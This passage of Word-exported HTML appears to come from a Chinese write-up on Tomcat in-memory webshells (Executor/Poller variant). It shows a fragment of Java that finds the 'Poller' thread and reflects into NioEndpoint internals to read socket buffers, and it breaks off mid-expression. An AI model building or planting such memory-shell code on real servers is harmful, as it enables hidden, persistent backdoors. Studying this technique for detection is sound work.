style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">threadName</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">contains</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"Poller"</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">))</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                        </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Object</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> target </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getField</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">thread</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"target"</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                        </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">if</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">target </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">instanceof</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Runnable</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                            </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">try</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                                </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">byte</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[]</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> bytes </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">byte</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">8192</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">];</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">//Tomcat的NioSocketWrapper中默认buffer大小</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                                </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">ByteBuffer</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> buf </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">ByteBuffer</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">wrap</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">bytes</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                                </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">try</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                                    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">LinkedList</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> linkedList </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">LinkedList</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getField</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getField</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getField</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">target</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"selector"</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: 